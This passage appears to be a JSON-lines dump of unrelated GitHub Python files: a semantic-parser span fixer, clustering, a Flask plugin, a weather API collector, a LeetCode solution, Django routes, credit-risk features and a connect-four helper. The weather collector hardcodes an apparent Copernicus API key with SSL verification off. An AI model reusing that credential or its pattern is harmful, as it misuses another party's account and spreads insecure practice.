covered_spans\n\n def 
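# --- Illustrative sketch (not part of the source): get_clusters above unions
# every pair of nodes whose character spans overlap and then buckets nodes by
# their union-find root (UnionNode). The same grouping with a minimal
# path-compressing find; the spans are toy data:
def find(parent, x):
    while parent[x] != x:
        parent[x] = parent[parent[x]]  # path compression
        x = parent[x]
    return x

def union(parent, a, b):
    parent[find(parent, a)] = find(parent, b)

def overlapped(s1, s2):
    return s1[0] < s2[1] and s1[1] > s2[0]

spans = {0: (0, 5), 1: (3, 8), 2: (10, 12)}
parent = {i: i for i in spans}
for i in spans:
    for j in spans:
        if i < j and overlapped(spans[i], spans[j]):
            union(parent, i, j)

clusters = {}
for i in spans:
    clusters.setdefault(find(parent, i), set()).add(i)
print(list(clusters.values()))  # [{0, 1}, {2}]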
_fix_stage2_special(self, sentence, solved_nodeids, unsolved_nodes,\n                            missing_spans, covered_spans):\n        SPECIAL_NEG_REGEX = '(^.+(?:\\'t|not)$)|^un|^dis'\n\n        missing_tokens = [sentence[span[0]:span[1]] for span in missing_spans]\n        if all(token == '/' for token in missing_tokens) \\\n           and all(node.label in {'_and_c', '_per_p'} for node in unsolved_nodes) \\\n           and len(unsolved_nodes) == len(missing_spans):\n            for node, span in zip(unsolved_nodes, missing_spans):\n                node.span = span\n            return True\n\n        if len(unsolved_nodes) == 2:\n            node1, node2 = unsolved_nodes\n            if node1.span == node2.span:\n                span = node1.span\n                string = sentence[span[0]:span[1]]\n                if re.match(SPECIAL_NEG_REGEX, string.strip(self.PUNCTUATIONS)):\n                    if node1.label == 'neg' or node2.label == 'neg':\n                        LOGGER.debug('special neg: %s %s %s', node1, node2, string)\n                        return True\n\n        if len(unsolved_nodes) == 1:\n            node = unsolved_nodes[0]\n            rest_span = node.span\n            for span in covered_spans:\n                rest_span = _span_subtract_span(rest_span, span)\n                if rest_span is None:\n                    break\n\n            if rest_span is not None:\n                string = sentence[rest_span[0]:rest_span[1]]\n                s, e = get_word_bounds2(string, '-/')\n                node.span = rest_span[0] + s, rest_span[0] + e\n                LOGGER.debug('use rest span: %s %s %s', node, string,\n                             sentence[node.span[0]:node.span[1]])\n                return True\n\n    def _get_tokens(self, node, sentence):\n        span = node.span\n\n        string = sentence[span[0]:span[1]].lower()\n        # strip punctuation on both sides, but remember the positions\n        s, e = get_word_bounds(string)\n        stripped_string = string[s:e]\n\n        tokens = None\n        try_chars, *special_cases = self.SPLIT_STRINGS\n        for matcher, sep, extra in special_cases:\n            result = _match_label(stripped_string, matcher)\n            if result:\n                if extra and isinstance(extra[0], str):\n                    tokens = extra\n                elif extra and isinstance(extra[0], int):\n                    tokens = [result.group(index) for index in extra]\n                else:\n                    tokens = stripped_string.split(sep)\n                break\n\n        if tokens is None:\n            for sep in try_chars:\n                tokens = stripped_string.split(sep)\n                if len(tokens) > 1:\n                    break\n\n        token_starts = [s]\n        for token in tokens[:-1]:\n            token_starts.append(token_starts[-1] + len(sep) + len(token))\n\n        new_token_starts = []\n        new_tokens = []\n        for token, token_start in zip(tokens, token_starts):\n            new_token_starts.append(token_start)\n            for subtoken in token.split(' '):\n                new_tokens.append(subtoken)\n                new_token_starts.append(new_token_starts[-1] + len(subtoken) + 1)\n        new_token_starts.pop()\n\n        if len(new_tokens) <= 1:\n            return None, None, None\n\n        start = node.span[0]\n        for token, token_start in zip(new_tokens, new_token_starts):\n            token_start += start\n            if token != sentence[token_start:token_start + len(token)].lower():\n                __import__(\"pdb\").set_trace()\n\n        return new_tokens, new_token_starts, sep\n\n    def _get_carg(self, node, sep):\n        return node.carg.lower() \\\n            .replace('+', ' ') \\\n            .replace('_', ' ').strip().rstrip(sep)\n\n    def _get_matcher(self, node, sentence, sep,\n                     is_number, is_name, is_much, is_comp, is_neg):\n        if is_number:\n            carg = self._get_carg(node, sep)\n            matcher = self.CARD_TRANSFORM.get(carg, carg)\n        elif is_comp:\n            matcher = self.COMP_REGEX\n        elif is_name:\n            matcher = self._get_carg(node, sep)\n            # drop a trailing '-'\n            if matcher[-1] == sep:\n                matcher = matcher[:-1]\n            matcher = self.NAME_ENTITY.get(matcher, matcher)\n        elif is_neg:\n            matcher = self.NEG_REGEX\n        elif is_much:\n            matcher = self.MUCH_REGEX\n        else:\n            matcher, _ = get_lemma_and_pos(node.label)\n\n        matcher = self.REGEX_MAP.get(matcher, matcher)\n\n        return matcher\n\n    def _get_lemma(self, token, pos_tag):\n        token = 
token.strip(self.PUNCTUATIONS)\n try:\n return get_wordnet().lemmatize(token, pos_tag)\n except Exception:\n return token\n\n def _get_matched_tokens(self, node, sentence, nodes,\n is_number, is_name, is_much, is_comp, is_neg):\n tokens, token_starts, sep = self._get_tokens(node, sentence)\n if tokens is None:\n return None, None\n\n matcher = self._get_matcher(node, sentence, sep,\n is_number, is_name, is_much, is_comp, is_neg)\n\n matched_tokens = []\n\n for token, token_start in zip(tokens, token_starts):\n start = token_start + node.span[0]\n token_lemma = self._get_lemma(token, node.pos)\n if isinstance(matcher, str):\n pred = token == matcher \\\n or (token_lemma, matcher) in self.TOKEN_LEMMA_SPECIAL_CASE \\\n or token_lemma.startswith(matcher) \\\n or (len(token_lemma) >= 3 and matcher.startswith(token_lemma)) \\\n or (token_lemma.endswith('ied') and\n token_lemma[:-3] == matcher[:-1])\n else:\n pred = re.match(matcher, token_lemma)\n\n if pred:\n matched_tokens.append(((start, start + len(token)), token))\n\n exact_tokens = [(span, token) for span, token in matched_tokens if token == matcher]\n if len(exact_tokens) == 1:\n if len(matched_tokens) > 1:\n LOGGER.debug('use exact match: %s %s', node, matched_tokens)\n matched_tokens = [exact_tokens[0]]\n\n return matched_tokens, sep\n\n def fix_stage3(self, graph, tokens, spans):\n\n chars = '-/.,\"?!;() '\n for node in graph.nodes.values():\n start, end = node.span\n\n first, last = _find_span_in_spans_multi((start, end), spans)\n if first == last:\n continue\n\n while first < last \\\n and all((char in chars) for char in tokens[first]):\n first += 1\n\n while first < last \\\n and all((char in chars) for char in tokens[last - 1]):\n last -= 1\n\n if first < last:\n span = spans[first][0], spans[last - 1][1]\n if span != node.span:\n node.span = span\n","repo_name":"hejingcao/semantic-parser","sub_path":"preprocess/concept_fixer.py","file_name":"concept_fixer.py","file_ext":"py","file_size_in_byte":17173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14684216419","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[42]:\n\n\nimport pickle\nwith open('dataset.pkl','rb') as f:\n dist = pickle.load(f)\n\n\n# In[43]:\n\n\nfor key in dist.keys():\n print(key,dist[key])\n\n\n# In[106]:\n\n\nmetric = input(\"Please enter 'min', 'max' or 'av'\")\n\n\n# In[107]:\n\n\nimport math\n\n\n# In[108]:\n\n\nclusters = []\nfor i in range(311):\n clusters.append([i])\nprint(clusters)\n\n\n# In[109]:\n\n\ndef dist_cluster(cluster1, cluster2, metric):\n min_dist = math.inf\n max_dist = -math.inf\n av_dist = 0\n count=0\n for i in cluster1:\n for j in cluster2:\n count+=1\n if(dist[(i,j)] > max_dist):\n max_dist = dist[(i,j)]\n if(dist[(i,j)] < min_dist):\n min_dist = dist[(i,j)]\n av_dist+=dist[(i,j)]\n if(metric=='min'):\n return min_dist\n elif(metric=='max'):\n return max_dist\n elif(metric=='av'):\n return av_dist\n \n\n\n# In[110]:\n\n\ndef WSS(cluster):\n minss = 10e9\n #print(cluster)\n for point in cluster:\n squaredsum = 0\n for ppoint in cluster:\n #print(point,ppoint)\n squaredsum += dist[(point,ppoint)]\n if squaredsum < minss:\n minss = squaredsum\n return minss\n\n\n# In[111]:\n\n\ncount_iter=0\nWSS_list = []\nclust_list = []\n\nwhile(len(clusters)>1):\n #print(len(clusters))\n clust_list.append(len(clusters))\n #print(len(clust_list))\n WSS_temp=0\n for cluster in clusters:\n WSS_temp+=WSS(cluster)\n WSS_list.append(WSS_temp)\n '''\n print(clusters)\n print(WSS(clusters))\n 
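# --- Illustrative sketch (not part of the source): dist_cluster above selects
# between single ('min'), complete ('max') and average ('av') linkage over a
# precomputed pairwise distance table; note that average linkage divides the
# summed pairwise distances by the number of pairs. Stand-alone version over
# a made-up distance dict:
def linkage(c1, c2, dist, metric):
    pairs = [dist[(i, j)] for i in c1 for j in c2]
    if metric == 'min':
        return min(pairs)           # single linkage: closest pair
    if metric == 'max':
        return max(pairs)           # complete linkage: farthest pair
    return sum(pairs) / len(pairs)  # average linkage: mean over all pairs

dist = {(0, 2): 1.0, (0, 3): 4.0, (1, 2): 2.0, (1, 3): 5.0}
for metric in ('min', 'max', 'av'):
    print(metric, linkage([0, 1], [2, 3], dist, metric))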
print(\"###################\")\n    '''\n    \n    #NUMBER OF CLUSTERS WILL REDUCE BY 1 ON EACH ITERATION\n\n    min_dist = math.inf\n    clust1_idx = 0\n    clust2_idx = 0\n    \n    #FIND THE TWO CLUSTERS WHICH ARE CLOSEST\n    for i in range(len(clusters)):\n        for j in range(i+1,len(clusters)):\n            cache = dist_cluster(clusters[i], clusters[j], metric)\n            if(cache < min_dist):\n                min_dist = cache\n                clust1_idx = i\n                clust2_idx = j\n    \n    clust1 = clusters.pop(clust1_idx)\n    clust2 = clusters.pop(clust2_idx -1)\n    \n    clust1 = clust1+clust2\n    clusters.append(clust1)\n    \n    \n\n\n\n# In[112]:\n\n\nclust_list.append(len(clusters))\nWSS_list.append(WSS(clusters[0]))\n\n\n# In[113]:\n\n\nprint(len(clust_list))\nprint(len(WSS_list))\n\n\n# In[114]:\n\n\nimport matplotlib.pyplot as plt\nplt.plot(clust_list, WSS_list)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ansuman-eng/clustering","sub_path":"AGGLOMERATIVE/agglomerative.py.py","file_name":"agglomerative.py.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"43395170145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015-07-27\n\n@author: ruixidong\n'''\n\nfrom flask import render_template\nfrom jinja2 import ext,Environment,Template\n\n'''\nplugins:\n{name1:tuple(func,template),name2:tuple(func,template)}\n'''\nplugins={}\n\n\ndef Plugin(name,template=None):\n    def func(f):\n        plugins[name]=(f,template if template!=None else name,)\n        return f\n    return func\n\ndef __rend_plugin__(name):\n    global plugins\n    if plugins.has_key(name):\n        func,template=plugins[name]\n        context=func()\n        if context.has_key(\"__template__\"):\n            template=context[\"__template__\"]\n        else:\n            context[\"__template__\"]=template\n        return render_template(template,**context)\n    else:\n        return {}\n    \n\n\nfrom jinja2 import nodes\nfrom jinja2.ext import Extension\n\n\nclass FragmentPluginExtension(Extension):\n    # a set of names that trigger the extension.\n    tags = set(['plugin'])\n\n    def __init__(self, environment):\n        super(FragmentPluginExtension, self).__init__(environment)\n\n        # add the defaults to the environment\n        environment.extend(\n            fragment_cache_prefix='',\n            fragment_cache=None,\n        )\n\n    def parse(self, parser):\n        lineno = parser.stream.next().lineno\n        args = [parser.parse_expression()]\n        body = parser.parse_statements(['name:endplugin'], drop_needle=True)\n        return nodes.CallBlock(self.call_method('_render_plugin', args),\n                               [], [], body).set_lineno(lineno)\n\n    def _render_plugin(self, name, caller):\n        rv = __rend_plugin__(name)\n        return rv\n","repo_name":"drxbate/M1","sub_path":"WEB-APP/CRM-APP/htmlPlugins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"32386116496","text":"import cdsapi\nimport pygrib\n\nfrom .country import countries\nfrom .common import sync_fetch\n\n\n\"\"\"\nhttps://datahelpdesk.worldbank.org/knowledgebase/articles/902061-climate-data-api\n\"\"\"\nWB_ENDPOINT = 'http://climatedataapi.worldbank.org/climateweb/rest/v1'\nWB_API = WB_ENDPOINT + '/country/{type}/{var}/{start}/{end}/{ISO3}'\n\n\ndef run_cdsapi():\n    c = cdsapi.Client(\n        url='https://cds.climate.copernicus.eu/api/v2',\n        key='2496:2790f5a7-b4b7-47d5-9a3f-eeeb7fd47d3b',\n        verify=0,\n    )\n\n    r = c.retrieve(\n        'reanalysis-era5-single-levels',\n        {\n            'variable': 'total_precipitation',\n            'product_type': 'reanalysis',\n            'year': '2000',\n            'month': '01',\n            'day': '01',\n            'time': [\n            
'07:00', '08:00', '09:00',\n '10:00', '11:00', '12:00',\n '13:00', '14:00', '15:00',\n '16:00', '17:00', '18:00',\n '19:00', '20:00', '21:00',\n '22:00', '23:00'\n ],\n 'format': 'grib'\n })\n\n r.download('.cache/download.grib')\n grbs = pygrib.open('.cache/download.grib')\n for grb in grbs:\n print(grb.values)\n\n\ndef request_exception_handler(request, exception):\n print('{} Failed'.format(request.url))\n\n\ndef run_wb():\n urls = [\n WB_API.format(\n type='mavg',\n var='pr',\n start='2008',\n end='2018',\n ISO3=country['iso3'],\n ) for country in countries\n ]\n resps = sync_fetch(\n urls,\n headers={},\n exception_handler=request_exception_handler\n )\n for r in resps:\n print(r['url'], r['json'])\n","repo_name":"toggle-corp/ifrc","sub_path":"ifrc-api/collector/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37281905558","text":"#\n# @lc app=leetcode id=1219 lang=python3\n#\n# [1219] Path with Maximum Gold\n#\n# https://leetcode.com/problems/path-with-maximum-gold/description/\n#\n# algorithms\n# Medium (63.12%)\n# Likes: 250\n# Dislikes: 11\n# Total Accepted: 15.8K\n# Total Submissions: 25.1K\n# Testcase Example: '[[0,6,0],[5,8,7],[0,9,0]]'\n#\n# In a gold mine grid of size m * n, each cell in this mine has an integer\n# representing the amount of gold in that cell, 0 if it is empty.\n# \n# Return the maximum amount of gold you can collect under the conditions:\n# \n# \n# Every time you are located in a cell you will collect all the gold in that\n# cell.\n# From your position you can walk one step to the left, right, up or down.\n# You can't visit the same cell more than once.\n# Never visit a cell with 0 gold.\n# You can start and stop collecting gold from any position in the grid that has\n# some gold.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: grid = [[0,6,0],[5,8,7],[0,9,0]]\n# Output: 24\n# Explanation:\n# [[0,6,0],\n# ⁠[5,8,7],\n# ⁠[0,9,0]]\n# Path to get the maximum gold, 9 -> 8 -> 7.\n# \n# \n# Example 2:\n# \n# \n# Input: grid = [[1,0,7],[2,0,6],[3,4,5],[0,3,0],[9,0,20]]\n# Output: 28\n# Explanation:\n# [[1,0,7],\n# ⁠[2,0,6],\n# ⁠[3,4,5],\n# ⁠[0,3,0],\n# ⁠[9,0,20]]\n# Path to get the maximum gold, 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7.\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= grid.length, grid[i].length <= 15\n# 0 <= grid[i][j] <= 100\n# There are at most 25 cells containing gold.\n# \n#\n\n# @lc code=start\nclass Solution:\n def getMaximumGold(self, grid: List[List[int]]) -> int:\n # BFS\n # O(4^N)\n\n m, n = map(len, (grid, grid[0]))\n q, goldCellId, ans = [], 0, 0\n oneCellTrace = [[0] * n for _ in range(m)]\n\n for i in range(m):\n for j in range(n):\n if grid[i][j]:\n oneCellTrace[i][j] = 1 << goldCellId\n goldCellId += 1\n q.append((i, j, grid[i][j], oneCellTrace[i][j]))\n\n for i, j, s, trace in q:\n ans = max(ans, s)\n for r, c in (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1):\n if 0 <= r < m and 0 <= c < n and grid[r][c] \\\n and not (trace & oneCellTrace[r][c]):\n q.append((r, c, grid[r][c] + s, trace | oneCellTrace[r][c]))\n\n return ans\n\n\n # def dfs(i, j, s, seen):\n # if i < 0 or i >= m or j < 0 or j >= n or not grid[i][j] or (i, j) in seen:\n # return s\n\n # seen.add((i, j))\n # s += grid[i][j]\n # mx = 0\n # for x, y in (i, j + 1), (i, j - 1), (i + 1, j), (i - 1, j):\n # mx = max(dfs(x, y, s, seen), mx)\n\n # seen.discard((i, j))\n # return mx\n\n # m, n = map(len, (grid, grid[0]))\n # return max(dfs(i, j, 0, set()) 
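# --- Illustrative sketch (not part of the source): the solution above encodes
# each gold cell as one bit (1 << id) and carries a path's visited set in a
# single integer, so "already visited" is a bitwise AND and "extend the path"
# a bitwise OR. The same encoding on the problem's first example, using DFS:
def max_gold(grid):
    m, n = len(grid), len(grid[0])
    bit = {(i, j): 1 << k
           for k, (i, j) in enumerate((i, j) for i in range(m)
                                      for j in range(n) if grid[i][j])}

    def dfs(i, j, seen):
        if not (0 <= i < m and 0 <= j < n) or not grid[i][j] or seen & bit[(i, j)]:
            return 0
        seen |= bit[(i, j)]  # mark this cell in the path's bitmask
        return grid[i][j] + max(dfs(i + 1, j, seen), dfs(i - 1, j, seen),
                                dfs(i, j + 1, seen), dfs(i, j - 1, seen))

    return max(dfs(i, j, 0) for i in range(m) for j in range(n) if grid[i][j])

print(max_gold([[0, 6, 0], [5, 8, 7], [0, 9, 0]]))  # 24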
for j in range(n) for i in range(m))\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1219.path-with-maximum-gold.py","file_name":"1219.path-with-maximum-gold.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"40222479060","text":"\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('index', views.index, name='index'),\n path('findcopies', views.findcopies),\n path('addbook', views.addbook),\n path('viewbook', views.viewbook),\n path('addstudent', views.addstudent),\n path('viewstudent', views.viewstudent),\n path('issuebook', views.issuebook),\n path('deletebook', views.deletebook),\n path('deletestudent', views.deletestudent),\n path('viewissuedbook', views.viewissuedbook),\n #path('sendmail', views.sendmail),\n path('searchbook', views.searchbook),\n path('searchstudent', views.searchstudent),\n path('venue_pdf', views.venue_pdf, name='venue_pdf'),\n path('book_pdf', views.book_pdf, name='book_pdf'),\n path('student_pdf', views.student_pdf, name='student_pdf'),\n path('issuedbook_pdf', views.issuedbook_pdf, name='issuedbook_pdf'),\n path('monthlyissuedbook_pdf', views.monthlyissuedbook_pdf, name='monthlyissuedbook_pdf'),\n path('book/upload', views.BookUploadView, name ='BookUploadView'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"jayri5/basic-library-management-system","sub_path":"library/entry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6597406610","text":"import os\nimport sys\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import PredefinedSplit\nfrom tqdm import tqdm\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append('../../spica')\nfrom spica.features.base import Feature, generate_features, get_arguments\nfrom feat import SubfileFeature\nfrom utils import timer\nfrom config import *\n\nFeature.dir = '../working'\nFeature.prefix = 'inst'\n\n\ndef target_encoding(df, col, fill=None):\n res = pd.DataFrame(index=df.index)\n for i, (trn_idx, val_idx) in tqdm(enumerate(cv.split(train.SK_ID_CURR)), total=cv.get_n_splits()):\n idx = train.SK_ID_CURR[trn_idx].values\n ref = df.query('SK_ID_CURR in @idx').groupby(col)['TARGET'].mean()\n res[i] = df.query('SK_ID_CURR not in @idx')[col].replace(ref)\n if fill is None:\n res[i] = res[i].replace(df[col].unique(), df.query('SK_ID_CURR in @idx')['TARGET'].mean()).astype(float)\n else:\n res[i] = res[i].replace(df[col].unique(), fill).astype(float)\n return res.mean(axis=1)\n\n\nclass InstBasic(SubfileFeature):\n def create_features(self):\n df = inst.copy()\n df['DPD'] = np.maximum(df.DAYS_ENTRY_PAYMENT - df.DAYS_INSTALMENT, 0)\n df['DBD'] = np.maximum(df.DAYS_INSTALMENT - df.DAYS_ENTRY_PAYMENT, 0)\n aggs = {\n 'SK_ID_CURR': ['first'],\n 'NUM_INSTALMENT_VERSION': ['nunique'],\n 'DPD': ['max', 'sum'],\n 'DBD': ['max', 'sum'],\n 'AMT_INSTALMENT': ['sum'],\n 'AMT_PAYMENT': ['sum'],\n }\n via = df.groupby('SK_ID_PREV').agg(aggs).reset_index(drop=True)\n via.columns = ['_'.join(f) if f[0] != 'SK_ID_CURR' else f[0] for f in via.columns]\n via['DPD_nonzero'] = df.query(\"DPD > 
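# --- Illustrative sketch (not part of the source): target_encoding above
# computes each row's category -> target-mean mapping only from the training
# folds of the CV split, so no row is encoded with its own label (no leakage).
# A compact out-of-fold variant with KFold; the toy frame is made up:
import numpy as np
import pandas as pd
from sklearn.model_selection import KFold

def oof_target_encode(df, col, target, n_splits=3, seed=0):
    enc = pd.Series(np.nan, index=df.index, dtype=float)
    for trn_idx, val_idx in KFold(n_splits, shuffle=True, random_state=seed).split(df):
        means = df.iloc[trn_idx].groupby(col)[target].mean()
        enc.iloc[val_idx] = df.iloc[val_idx][col].map(means).to_numpy()
    return enc.fillna(df[target].mean())  # unseen categories get the global mean

df = pd.DataFrame({'cat': list('aabbbc'), 'y': [1, 0, 1, 1, 0, 1]})
print(oof_target_encode(df, 'cat', 'y'))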
0\").groupby('SK_ID_PREV').size().fillna(0)\n via['DBD_nonzero'] = df.query(\"DBD > 0\").groupby('SK_ID_PREV').size().fillna(0)\n self.df = via.groupby('SK_ID_CURR').agg({'mean', 'max'})\n self.df.columns = [f[0] + '_' + f[1] for f in self.df.columns]\n\n\nclass InstTarget(SubfileFeature):\n def create_features(self):\n df = train[['SK_ID_CURR', 'TARGET']].merge(inst, on='SK_ID_CURR', how='right')\n df['bin'] = pd.qcut(inst.NUM_INSTALMENT_VERSION, 500, duplicates='drop', labels=False, retbins=False)\n df['NUM_INSTALMENT_VERSION_target'] = target_encoding(df, 'bin')\n self.df['NUM_INSTALMENT_VERSION_target'] = df.groupby('SK_ID_CURR').NUM_INSTALMENT_VERSION_target.mean()\n\n\nclass InstAmount(SubfileFeature):\n def create_features(self):\n df = inst.copy()\n df['payment_to_schedule_ratio'] = np.log1p(df.AMT_PAYMENT) - np.log1p(df.AMT_INSTALMENT)\n df = df.groupby('SK_ID_PREV').mean()\n df['AMT_PAYMENT_variation_ratio'] = inst.groupby('SK_ID_PREV').AMT_PAYMENT.std() / inst.groupby(\n 'SK_ID_PREV').AMT_PAYMENT.mean()\n df.reset_index(drop=True, inplace=True)\n self.df = df.groupby('SK_ID_CURR')[[\n 'payment_to_schedule_ratio', 'AMT_PAYMENT_variation_ratio'\n ]].agg({'min', 'mean', 'max'})\n self.df.columns = [f[0] + '_' + f[1] for f in self.df.columns]\n\n\nclass InstDelayedAndPrepayed(SubfileFeature):\n def create_features(self):\n df = prev.copy().set_index('SK_ID_PREV')\n ins = inst.copy()\n ins['days_diff'] = ins.DAYS_INSTALMENT - ins.DAYS_ENTRY_PAYMENT\n g = ins.query('days_diff > 0').groupby('SK_ID_PREV')\n df['delayed_count'] = g.size()\n df['delayed_days_sum'] = g.days_diff.sum()\n df['delayed_days_mean'] = g.days_diff.mean()\n df['first_delayed_inst_num'] = g.NUM_INSTALMENT_NUMBER.first()\n df['delayed_AMT_ANNUITY'] = df.query(\"delayed_count > 0\").AMT_ANNUITY\n df['delayed_AMT_CREDIT'] = df.query(\"delayed_count > 0\").AMT_CREDIT\n \n g = ins.query('days_diff < 0').groupby('SK_ID_PREV')\n df['prepayed_count'] = g.size()\n df['prepayed_days_sum'] = -g.days_diff.sum()\n df['prepayed_days_mean'] = -g.days_diff.mean()\n df['first_prepayed_inst_num'] = g.NUM_INSTALMENT_NUMBER.first()\n df['prepayed_AMT_ANNUITY'] = df.query(\"prepayed_count > 0\").AMT_ANNUITY\n df['prepayed_AMT_CREDIT'] = df.query(\"prepayed_count > 0\").AMT_CREDIT\n \n aggs = {\n 'delayed_count': ['mean', 'max', 'sum', 'count'],\n 'delayed_days_sum': ['mean', 'max', 'sum'],\n 'delayed_days_mean': ['mean', 'max', 'sum'],\n 'first_delayed_inst_num': ['min', 'mean', 'max'],\n 'delayed_AMT_ANNUITY': ['min', 'mean'],\n 'delayed_AMT_CREDIT': ['min', 'mean'],\n 'prepayed_count': ['mean', 'max', 'sum', 'count'],\n 'prepayed_days_sum': ['mean', 'max', 'sum'],\n 'prepayed_days_mean': ['mean', 'max', 'sum'],\n 'first_prepayed_inst_num': ['min', 'mean', 'max'],\n 'prepayed_AMT_ANNUITY': ['mean', 'max'],\n 'prepayed_AMT_CREDIT': ['mean', 'max'],\n }\n all_df = df.groupby('SK_ID_CURR').agg(aggs)\n all_df.columns = ['all_' + f[0] + '_' + f[1] for f in all_df.columns]\n past_df = df.query(\"DAYS_TERMINATION < 0\").groupby('SK_ID_CURR').agg(aggs)\n past_df.columns = ['past_' + f[0] + '_' + f[1] for f in past_df.columns]\n future_df = df.query(\"DAYS_TERMINATION > 0\").groupby('SK_ID_CURR').agg(aggs)\n future_df.columns = ['future_' + f[0] + '_' + f[1] for f in future_df.columns]\n self.df = pd.concat([all_df, past_df, future_df], axis=1)\n\n\nclass InstAmountToApplication(Feature):\n prefix = ''\n \n def create_features(self):\n trn = pd.read_feather(WORKING / 'inst_delayed_and_prepayed_train.ftr')\n tst = pd.read_feather(WORKING / 
'inst_delayed_and_prepayed_test.ftr')\n cols = trn.filter(regex='AMT_CREDIT').columns\n for f in cols:\n self.train[f'{f}_to_application'] = train['AMT_CREDIT'] / trn[f]\n self.test[f'{f}_to_application'] = test['AMT_CREDIT'] / tst[f]\n cols = trn.filter(regex='AMT_ANNUITY').columns\n for f in cols:\n self.train[f'{f}_to_application'] = train['AMT_ANNUITY'] / trn[f]\n self.test[f'{f}_to_application'] = test['AMT_ANNUITY'] / tst[f]\n\n\nclass InstPaidByPeriod(SubfileFeature):\n def create_features(self):\n inst_ = inst.copy()\n inst_['days_diff'] = inst_['DAYS_ENTRY_PAYMENT'] - inst_['DAYS_INSTALMENT']\n inst_['paid_late'] = np.maximum(inst_['days_diff'], 0)\n inst_['paid_early'] = np.minimum(inst_['days_diff'], 0).abs()\n dfs = []\n df = inst_.groupby('SK_ID_PREV')[['days_diff', 'paid_late', 'paid_early']].agg(['mean', np.count_nonzero])\n df.columns = [f[0] + '_' + f[1] for f in df.columns]\n dfs.append(df)\n for period in tqdm([3, 5, 10]):\n df = inst_.groupby('SK_ID_PREV').head(period).groupby('SK_ID_PREV')[['paid_late', 'paid_early']].agg([\n 'mean', np.count_nonzero])\n df.columns = df.columns = [f'first_{period}_{f[0]}_{f[1]}' for f in df.columns]\n dfs.append(df)\n \n df = inst_.groupby('SK_ID_PREV').tail(period).groupby('SK_ID_PREV')[['paid_late', 'paid_early']].agg([\n 'mean', np.count_nonzero])\n df.columns = df.columns = [f'last_{period}_{f[0]}_{f[1]}' for f in df.columns]\n dfs.append(df)\n \n df = pd.concat(dfs, axis=1) # type: pd.DataFrame\n df = df.merge(inst_[['SK_ID_PREV', 'SK_ID_CURR']].drop_duplicates(), left_index=True, right_on='SK_ID_PREV',\n how='left')\n self.df = df.groupby('SK_ID_CURR').mean()\n\n\nif __name__ == '__main__':\n args = get_arguments('main')\n with timer('load dataset'):\n train = pd.read_feather(TRAIN)\n test = pd.read_feather(TEST)\n prev = pd.read_feather(PREV)\n inst = pd.read_feather(INST)\n cv_id = pd.read_feather(INPUT / 'cv_id.ftr')\n cv = PredefinedSplit(cv_id)\n \n # with timer('preprocessing'):\n \n with timer('create dataset'):\n generate_features(globals(), args.force)\n","repo_name":"amaotone/home-credit-default-risk","sub_path":"feat/inst.py","file_name":"inst.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"5670179659","text":"from getColumns import columns\nfrom copy import copy\n\ndef diagonals_TRigth_BLeft(grid):\n\n new_grid = copy(grid)\n for i in range(0, len(new_grid)):\n new_grid[i] = new_grid[i] + [\"n\"] * (len(new_grid) - 1 - i)\n if i != 0:\n for j in range(0, i):\n new_grid[i].insert(0, \"n\")\n dTRigth_BLeft = columns(new_grid)\n return dTRigth_BLeft\n\ndef diagonals_TLeft_BRight(grid):\n new_grid = copy(grid)\n for i in range(0, len(new_grid)):\n new_grid[i] = new_grid[i] + [\"n\"] * i\n for j in range(0, len(new_grid) - 1 - i):\n new_grid[i].insert(0, \"n\")\n dTLeft_BRight = columns(new_grid)\n return dTLeft_BRight\n\ndef diagonals_length_four_or_over(diagonals):\n for x in range(len(diagonals)):\n diag_str = \"\".join(diagonals[x])\n diag_str = diag_str.replace(\"n\", \"\")\n diag_list = list(diag_str)\n diagonals.append(diag_list)\n return diagonals[len(diagonals) / 2:]\n\n\ndef diagonals(grid):\n diag = diagonals_length_four_or_over(diagonals_TLeft_BRight(grid))[3:-3] + diagonals_length_four_or_over(diagonals_TRigth_BLeft(grid))[3:-3]\n return diag","repo_name":"DamirTesnjak/Python-vaje-Python-exercises","sub_path":"Štiri v 
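# --- Illustrative sketch (not part of the source): the feature classes above
# repeatedly aggregate with several statistics per column and then flatten the
# resulting MultiIndex into plain 'column_stat' names so downstream code can
# address features as strings. Minimal reproduction on a toy frame:
import pandas as pd

df = pd.DataFrame({'SK_ID_CURR': [1, 1, 2],
                   'AMT_PAYMENT': [10.0, 20.0, 5.0]})
agg = df.groupby('SK_ID_CURR').agg({'AMT_PAYMENT': ['mean', 'max', 'sum']})
agg.columns = ['_'.join(col) for col in agg.columns]  # e.g. AMT_PAYMENT_mean
print(agg)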
